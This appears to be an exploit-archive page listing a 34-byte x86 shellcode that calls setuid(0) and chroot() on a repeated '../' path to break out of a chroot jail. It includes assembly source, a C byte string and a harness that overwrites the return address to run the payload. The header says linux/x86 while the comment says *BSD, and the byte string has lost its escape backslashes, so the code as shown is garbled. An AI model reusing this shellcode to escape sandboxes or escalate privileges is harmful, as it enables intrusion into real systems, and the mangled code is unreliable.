linux/x86 break chroot 34 bytes

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : linux/x86 break chroot 34 bytes
# Published : 2004-09-12
# Author : dev0id
# Previous Title : 返回列表
# Next Title : linux/x86 break chroot 46 bytes

/* The setuid(0)+chroot() shellcode. It is the one of the smallest shellcodes
   in the !!world!!
   it will put '../' 10 times
   Size  34 bytes
   OS	 *BSD
  		/rootteam/dev0id	(www.sysworld.net)
			dev0id@uncompiled.com 

BITS	32

	xor	ecx,ecx
	xor	eax,eax
	push	eax
	mov	al,0x17
	push	eax
	int	0x80
	push	ecx
	mov	cl,0x1e
main_push:
	push byte 0x2e
	loop	main_push
	mov	cl,0x1e
main_loop:
	dec	cl
	inc byte [esp+ecx]
	dec	cl
	loop	main_loop
	push 	esp
	mov	al,0x3d
	push	eax
	int	0x80

*/
char shellcode[] =
	"x31xc9x31xc0x50xb0x17x50xcdx80x51xb1x1ex6ax2e"
	"xe2xfcxb1x1exfexc9xfex04x0cxfexc9xe2xf7x54xb0"
	"x3dx50xcdx80";

int
main(void)
{
	int *ret;
	ret = (int*)&ret + 2;
	(*ret) = shellcode;
}

// www.Syue.com [2004-09-12]